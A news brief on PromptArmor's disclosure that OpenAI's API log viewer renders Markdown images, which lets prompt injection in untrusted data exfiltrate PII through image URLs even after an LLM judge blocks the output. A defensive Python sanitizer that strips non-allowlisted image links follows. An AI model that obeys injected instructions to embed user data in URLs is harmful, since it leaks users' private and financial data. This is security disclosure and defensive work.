HeadlinesBriefing.com

OpenAI API Logs Vulnerable to Data Exfiltration

Hacker News: Front Page

Security researchers at PromptArmor discovered a vulnerability in OpenAI's API log viewer that allows data exfiltration even when applications block malicious outputs. The flaw lies in insecure Markdown rendering, which exposes sensitive data from apps and agents built on the OpenAI Platform. This affects the default 'responses' API, used by many vendors.

The attack chain involves a prompt injection in untrusted data, which generates a malicious image URL containing victim data. While an app-level defense like an LLM judge blocks the response, the OpenAI log viewer still renders it, triggering a request to the attacker's server. This exposes PII and financial data.

The issue was disclosed to OpenAI, which closed the report as 'Not Applicable' after four follow-ups. The vulnerability also impacts preview environments like Agent Builder and the Starter ChatKit app. Developers using OpenAI as a subprocessor are likely exposed and need external precautions, since the platform itself offers no patch.
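As an added example (not from PromptArmor's report or OpenAI), the Python below shows one precaution for tooling you control: it finds Markdown and HTML image references in model output that point outside an allowlist and replaces them with inert text before the output is rendered. The allowlist, function names and sample output are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host this app legitimately embeds images from.
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}

# Constructs that make a Markdown/HTML renderer fetch a URL when displayed.
PATTERNS = [
    re.compile(r'!\[[^\]]*\]\(\s*<?(?P<url>[^)\s>]+)>?[^)]*\)'),  # ![alt](url "title")
    re.compile(r'^\s{0,3}\[[^\]]+\]:\s*<?(?P<url>\S+?)>?(?:\s.*)?$', re.M),  # [ref]: url
    re.compile(r'<img\b[^>]*?\bsrc\s*=\s*["\']?(?P<url>[^"\'\s>]+)[^>]*>', re.I),
]

def remote_host(url):
    """Host a renderer would contact for this URL, or None if no remote fetch."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return "unparsable-url"  # fail closed: never on the allowlist
    if parts.scheme in ("http", "https") or url.startswith("//"):
        return (parts.hostname or "").lower()
    return None  # relative paths and data: URIs stay local

def find_untrusted_images(text):
    """Return (host, has_query) for each reference to a non-allowlisted host."""
    hits = []
    for pattern in PATTERNS:
        for m in pattern.finditer(text):
            host = remote_host(m.group("url"))
            if host is not None and host not in ALLOWED_IMAGE_HOSTS:
                hits.append((host, "?" in m.group("url")))
    return hits

def neutralize(text):
    """Replace untrusted references with inert text before display or storage."""
    def repl(m):
        host = remote_host(m.group("url"))
        if host is None or host in ALLOWED_IMAGE_HOSTS:
            return m.group(0)
        return "[remote image removed: %s]" % host
    for pattern in PATTERNS:
        text = pattern.sub(repl, text)
    return text

# Constructed sample of model output: one untrusted image, one allowed image.
SAMPLE = ("Summary ready.\n![s](https://untrusted.example/p.png?d=name%3DJane)\n"
          "![logo](https://cdn.example.com/logo.png)\n")

if __name__ == "__main__":
    print(find_untrusted_images(SAMPLE))
    print(neutralize(SAMPLE))
```

A hit with `has_query` set is the case worth reviewing first, since the query string is where injected output would carry data out.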